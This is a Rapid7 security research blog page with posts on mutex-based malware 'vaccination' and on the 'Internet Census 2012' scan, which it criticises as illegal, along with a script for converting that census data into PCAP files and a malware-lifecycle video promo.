Leder created "nonficker", a tool that pre-registers Conficker mutexes on a system in order to inoculate it against Conficker infections. As a high percentage of malicious samples uses mutexes to limit double infection, one could imagine a tool that uses this technique for protecting against all those samples at the same time. Sadly it is quite time-consuming to reconstruct the correct mutex generation algorithm that is used in the malware itself. What do you think of the technique and the tool? Would you run this on your employee workstations to thwart infection by some VM-aware malware? If largely adopted such techniques could make it more expensive for attackers to be successful and force them to either choose to give up on infecting "vaccinated" systems or to abandon the use of such anti-virtualization techniques, making life of malware analysts and security firms way easier. While being just a simple trick targeting a specific subset of malware in the wild, it wants to be an example on how using out-of-the-box techniques and being dynamic enough could let us gain an upper hand in the struggle against malware. UPDATE: We were pointed to a paper containing this technique from 2008. They did even go further and put in more indicators and evaluated the concept on a larger set of malware. While I did not know the paper before, I already mentioned that people had been doing similar approaches and we did not invent the method. This post's focus was to bring up the discussion again and on the quick creation of a small poc that people could actually run if they wanted to. It's good that we have a source promising decent effectiveness of the technique - so thanks! This is a Rapid7 Labs research brought to you by Mark Schloesser and Claudio Guarnieri. Greetings to Tillmann and Felix for their great work on Conficker .

Internet Census 2012 - Thoughts

This week, an anonymous researcher published the results of an "Internet Census" - an internet-wide scan conducted using 420,000 insecure devices connected to the public internet and yielding data on used IP space, ports, device types, services and more. After scanning parts…

This week, an anonymous researcher published the results of an "Internet Census" - an internet-wide scan conducted using 420,000 insecure devices connected to the public internet and yielding data on used IP space, ports, device types, services and more. After scanning parts of the internet, the researcher found thousands of insecurely configured devices using insecure / default passwords on services and used this fact to make those devices into scanning nodes for his project. He logged into the devices remotely, uploaded code to assist in the scans that also included another control mechanism and executed it. The Internet Census 2012 - as the author calls it - was published together with all its data at Internet Census 2012. The Approach It is interesting research, not only because of the data and findings - but also due to the techniques used to accomplish it. This is one of the few situations where a botnet is formed with good intentions and precautions to not interfere with any normal operation of the devices being used. The research both raises awareness about the vast availability of insecure devices on the public internet and at the same time provides the data for researchers for free. Despite these good intentions, this approach is still illegal in most countries and certainly unethical as far as the security community is concerned. Using insecure configurations and default passwords to get access to remote devices without permission of their owners is illegal and unethical. Going further, pushing and running code on these devices is even worse. The "whitehat nature" of the effort does not justify the means. As far as my personal opinion goes, I respect the technical aspects of the project and think it serves a good purpose for security awareness and as a data set for further research. On the other hand, I would never have done it in this way myself because of the illegality and ethical concerns around it, and I hope that it does not lead to too many malicious and borderline activities in the future. Other Similar Efforts There have been, and still are, ongoing efforts that do internet-wide surveys through legal means. These are often a little bit smaller in scale due to available resources and the associated costs with thorough scans. An example of this is the Critical Research: Internet Security Survey by HD Moore, which takes a different approach. "Critical.io," as it's known,  does covers a much smaller numbers of ports (18 vs 700 ), but has been continuously scanning the internet for months, gathering trend data in addition to a per-service snapshot. In the past six months, this project has revealed a number of security issues, including that over 50 million network-enabled devices at risk through the UPnP protocol, thousands of organizations at risk through misconfiguration of cloud storage, and helped identify surveillance malware being used by governments around the world. There have been other efforts that actually gave the name to the debatable "Internet Census 2012" project: Information Sciences Institute - 62 Days Almost 3 Billion Pings New Visualization Scheme = the First Internet Census Since 1982 This project was limited in it's depth as it only focuses on machines that reply to ICMP ping requests. Critical IO, Shodan, and the 2012 Census take this to another level. The Data As an example of how the data looks, the following output is a part of the file serviceprobes/80-TCP_GetRequest/80-TCP_GetRequest-1 in the dataset: 1355598900 5 1355618700 5 1343240100 3 1343231100 1       HTTP/1.1=20200=20OK=0D=0ADate:=20Thu,=2026=20Jul=202012=2007:05:09=20GMT=0D=0ALast-Modified:=20Tue,=2007=20Nov=202006=2003:41:23=20GMT=0D= [...] The format of the serviceprobes files is always comprised of four columns: IP address, timestamp, status code and response data (if any). If you are not interested in closed ports / timeouts / connections without responses, I recommend to filter and clean the data to only include the "status code 1" lines that actually include a response. Also the payload is stored in "quoted-printable" format which you should decode before doing any searches for plaintext and similar analysis. For my initial tests I put together a script that filters the data coming from the unpacker to ignore status != 1 and also decode the payload. When not using the quoted printable version, one can not store it in line-based form anymore as the payload also might contain newlines. I decided to quickly write out PCAP files with a crafted IP/TCP header as there are quite good libraries and tools out there to process data from PCAPs. You can find my small script here if you're interested. Using PCAP is certainly not optimal - using some database file format or other framing would be better. Running convert_census_probes in conjunction with the ZPAQ reference decoder: unzpaq200 80-TCP_GetRequest-1.zpaq | python convert_census_probes.py 80 80-TCP_GetRequest-1-open.pcap This leaves us with a wireshark-readable PCAP with the decoded payloads: There still is more room for playing around with the dataset - putting together better processing scripts, maybe even coming up with a way to put the data into a database for improved analytical possibilities. Next Steps I'm going to be digging into the data more, and I expect we'll see a lot of folks in the security industry digesting and commenting on the findings in coming weeks. I'd like to see more projects of this kind, conducted legally, and sharing information about the real state of play on the internet. Ultimately we need to raise awareness about the sad state of security across almost all our devices and systems. We have reached 2013 with our security and access protection far away from where they should be. Increased awareness, updated vendor priorities and more secure development are needed desperately. These projects remind us that we should all employ monitoring tools and vulnerability management in order to identify flaws in our systems before the bad guys do.

The Malware Lifecycle - Whiteboard Wednesday

The "Malware Lifecycle" is constantly evolving - the motivations and goals have changed in the past years and are completely different than what they historically used to be. Instead of being a skill demonstration and serving as proof-of-concepts we are nowadays mostly facing financially motivated…

The "Malware Lifecycle" is constantly evolving - the motivations and goals have changed in the past years and are completely different than what they historically used to be. Instead of being a skill demonstration and serving as proof-of-concepts we are nowadays mostly facing financially motivated threats and even industrial or national espionage becoming part of the problem.There are however a lot of possibilities for defending yourself, your company and your assets. Commercial and also several free open source tools can help you assess the threats you face and detect malicious activity on systems and networks.This Whiteboard Wednesday walks through the motivations, goals, techniques of malware authors and the ecosystem behind the threats. We also mention some of the things you can do against  it. Additionally it features awesome drawings by Maria Varmazis!Interested? Check out this week's Whiteboard Wednesday here!Make sure to give us feedback or contact us if you want to learn more and discuss best practices and options with us!

Featured Research

National Exposure Index 2017

The National Exposure Index is an exploration of data derived from Project Sonar, Rapid7's security research project that gains insights into global exposure to common vulnerabilities through internet-wide surveys.

Learn More

Upcoming Event


Rapid7's annual security summit is taking place September 12-14, 2017 in Boston, MA. Join industry peers for candid talks, focused trainings, and roundtable discussions that accelerate innovation, reduce risk, and advance your business.

Register Now


Security Nation

Security Nation is a podcast dedicated to covering all things infosec – from what's making headlines to practical tips for organizations looking to improve their own security programs. Host Kyle Flaherty has been knee–deep in the security sector for nearly two decades. At Rapid7 he leads a solutions-focused team with the mission of helping security professionals do their jobs.

Listen Now